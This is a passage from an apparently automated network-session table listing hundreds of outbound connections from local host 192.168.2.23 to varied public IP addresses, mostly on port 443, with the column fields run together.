                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16816192.168.2.2348104124.11.146.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16817192.168.2.2333386134.65.54.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16818192.168.2.233833883.153.17.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16819192.168.2.2347874147.158.45.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16820192.168.2.235426442.90.196.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16821192.168.2.2333108167.86.149.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16822192.168.2.2340526148.187.191.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16823192.168.2.2333964125.134.250.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16824192.168.2.2339380154.235.122.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16825192.168.2.233424457.18.238.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16826192.168.2.2355948210.248.202.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16827192.168.2.234059837.50.153.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16828192.168.2.2356498186.211.80.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16829192.168.2.2357082180.229.65.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16830192.168.2.2357768169.67.46.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16831192.168.2.2347068187.245.200.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16832192.168.2.2355324206.126.181.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16833192.168.2.2353778187.80.141.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16834192.168.2.2352506112.201.61.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16835192.168.2.233983841.14.151.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16836192.168.2.234346882.184.13.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16837192.168.2.2358628193.178.42.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16838192.168.2.234574013.57.64.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16839192.168.2.2352740162.23.108.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16840192.168.2.234141446.243.243.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16841192.168.2.234326086.144.87.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16842192.168.2.234199423.81.234.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16843192.168.2.2340778143.95.16.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16844192.168.2.233980234.39.85.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16845192.168.2.2337068107.231.8.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16846192.168.2.235600867.110.144.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16847192.168.2.2339520178.68.175.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16848192.168.2.2345178129.82.211.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16849192.168.2.2353002143.203.33.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16850192.168.2.233344438.139.31.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16851192.168.2.2349752133.101.165.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16852192.168.2.2360014219.146.134.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16853192.168.2.234282023.113.209.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16854192.168.2.2345224163.206.29.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16855192.168.2.2337276221.242.36.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16856192.168.2.235207677.60.134.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16857192.168.2.2348798222.221.35.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16858192.168.2.234792668.130.45.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16859192.168.2.234698264.89.242.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16860192.168.2.2356404106.221.255.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16861192.168.2.235914423.231.199.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16862192.168.2.233784837.71.218.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16863192.168.2.2336754141.62.249.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16864192.168.2.2350202103.127.129.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16865192.168.2.235918241.178.82.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16866192.168.2.2346286140.147.153.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16867192.168.2.2346214120.160.56.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16868192.168.2.2351348149.59.20.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16869192.168.2.2351788137.164.144.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16870192.168.2.2340954135.163.87.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16871192.168.2.234118035.173.159.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16872192.168.2.2355886132.58.187.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16873192.168.2.233381886.234.209.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16874192.168.2.235398086.235.6.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16875192.168.2.2355266103.40.219.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16876192.168.2.2345146137.228.186.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16877192.168.2.2355504217.82.87.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16878192.168.2.2334408139.165.161.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16879192.168.2.233809441.117.215.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16880192.168.2.2346718178.45.191.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16881192.168.2.2349110111.78.46.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16882192.168.2.2344950166.223.114.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16883192.168.2.2348580212.250.232.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16884192.168.2.233939887.158.159.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16885192.168.2.2334452170.140.179.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16886192.168.2.2342434159.89.213.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16887192.168.2.2353804152.177.238.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16888192.168.2.2334200193.151.67.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16889192.168.2.23593785.235.35.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16890192.168.2.2346984165.23.197.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16891192.168.2.2357602190.212.95.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16892192.168.2.2333130123.119.29.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16893192.168.2.233796651.245.70.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16894192.168.2.234704665.82.182.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16895192.168.2.2349250138.91.164.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16896192.168.2.2358170196.7.170.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16897192.168.2.233481283.181.229.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16898192.168.2.2341090168.247.123.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16899192.168.2.235040478.19.79.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16900192.168.2.2352610147.210.35.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16901192.168.2.2345914172.250.205.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16902192.168.2.235210254.4.83.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16903192.168.2.234558286.169.185.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16904192.168.2.2358204142.83.25.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16905192.168.2.23515768.61.47.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16906192.168.2.2335794191.183.233.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16907192.168.2.235355866.127.213.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16908192.168.2.235025243.247.39.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16909192.168.2.2344414160.227.89.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16910192.168.2.2341384216.55.108.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16911192.168.2.233352496.227.130.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16912192.168.2.2341076135.130.15.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16913192.168.2.2339928217.255.10.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16914192.168.2.2342340194.30.56.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16915192.168.2.233603063.143.39.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16916192.168.2.235882636.175.108.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16917192.168.2.234153650.222.19.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16918192.168.2.2333598135.149.141.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16919192.168.2.236053059.164.66.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16920192.168.2.2337052209.227.127.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16921192.168.2.2358382208.221.18.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16922192.168.2.235854286.74.33.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16923192.168.2.2347928138.140.138.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16924192.168.2.235471881.38.236.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16925192.168.2.233612441.175.13.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16926192.168.2.2352216191.189.30.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16927192.168.2.233361219.4.214.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16928192.168.2.235628664.169.207.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16929192.168.2.233441074.208.11.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16930192.168.2.2336412165.48.231.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16931192.168.2.2348700219.159.107.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16932192.168.2.233995090.169.251.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16933192.168.2.2347362205.117.35.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16934192.168.2.234593841.101.29.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16935192.168.2.2354042126.236.54.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16936192.168.2.2347016128.126.52.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16937192.168.2.2340774126.166.185.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16938192.168.2.236055498.151.82.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16939192.168.2.235700260.148.134.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16940192.168.2.2333482181.50.248.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16941192.168.2.2356256118.175.90.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16942192.168.2.2344684192.114.251.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16943192.168.2.2344392203.11.149.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16944192.168.2.2357956223.52.106.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16945192.168.2.2338636154.40.176.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16946192.168.2.2341166142.84.145.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16947192.168.2.234733278.84.182.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16948192.168.2.234531095.12.123.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16949192.168.2.2344586140.52.239.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16950192.168.2.235148664.161.44.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16951192.168.2.2360450199.201.16.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16952192.168.2.2360824138.116.253.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16953192.168.2.235774474.28.130.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16954192.168.2.2337772122.27.153.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16955192.168.2.233844261.231.43.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16956192.168.2.2360132142.140.94.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16957192.168.2.2357762173.153.4.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16958192.168.2.2356998163.249.231.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16959192.168.2.2349412167.156.118.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16960192.168.2.2354772145.26.138.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16961192.168.2.2353256135.25.38.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16962192.168.2.2359820136.169.134.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16963192.168.2.2357118103.194.112.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16964192.168.2.2344062219.207.108.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16965192.168.2.235970818.172.48.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16966192.168.2.2346292153.143.82.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16967192.168.2.23575808.183.48.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16968192.168.2.233447266.44.217.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16969192.168.2.2340624144.162.202.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16970192.168.2.234564244.137.204.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16971192.168.2.2360830222.18.44.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16972192.168.2.2359558142.129.10.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16973192.168.2.2339182125.184.79.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16974192.168.2.233293685.98.122.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16975192.168.2.2349780150.163.86.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16976192.168.2.233624259.236.210.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16977192.168.2.234141850.219.247.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16978192.168.2.234392665.210.171.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16979192.168.2.2357956107.126.32.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16980192.168.2.234940688.98.109.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16981192.168.2.23466961.254.57.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16982192.168.2.234101631.33.182.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16983192.168.2.2360628108.49.152.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16984192.168.2.234659632.118.226.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16985192.168.2.233502489.160.192.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16986192.168.2.233961475.212.130.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16987192.168.2.233364650.254.111.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16988192.168.2.235396064.157.172.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16989192.168.2.235003471.83.210.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16990192.168.2.2351380142.134.153.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16991192.168.2.236096048.248.203.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16992192.168.2.2353368114.142.238.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16993192.168.2.2355130122.24.208.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16994192.168.2.235311490.180.160.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16995192.168.2.2358572219.243.156.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16996192.168.2.2348106165.251.111.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16997192.168.2.2337346103.160.189.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16998192.168.2.23356942.197.42.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16999192.168.2.2355744110.154.195.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17000192.168.2.2356602201.33.174.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17001192.168.2.2339312129.239.175.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17002192.168.2.2349706186.45.84.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17003192.168.2.235630419.135.185.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17004192.168.2.234584619.122.118.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17005192.168.2.234892682.232.238.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17006192.168.2.2354834103.155.34.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17007192.168.2.2352176157.139.44.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17008192.168.2.2336226207.206.217.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17009192.168.2.2340614192.148.219.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17010192.168.2.233501864.222.251.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17011192.168.2.2360806177.63.142.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17012192.168.2.235480478.35.143.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17013192.168.2.235620078.106.156.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17014192.168.2.2337534146.215.205.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17015192.168.2.235890675.77.194.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17016192.168.2.2337278221.243.4.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17017192.168.2.2334162113.118.43.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17018192.168.2.235511051.8.81.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17019192.168.2.2340174154.215.82.828080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17020192.168.2.234893414.74.49.2278080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17021192.168.2.235845635.31.166.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17022192.168.2.236018875.29.154.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17023192.168.2.2340908155.4.181.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17024192.168.2.235767876.37.220.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17025192.168.2.2338866148.123.20.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17026192.168.2.2344482206.162.71.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17027192.168.2.235877071.184.159.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17028192.168.2.233396623.85.151.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17029192.168.2.234679420.96.53.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17030192.168.2.2334708122.114.85.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17031192.168.2.23567249.53.68.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17032192.168.2.2339662204.231.245.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17033192.168.2.2338546220.122.133.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17034192.168.2.233641638.164.48.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17035192.168.2.234535270.199.225.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17036192.168.2.2351196217.106.154.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
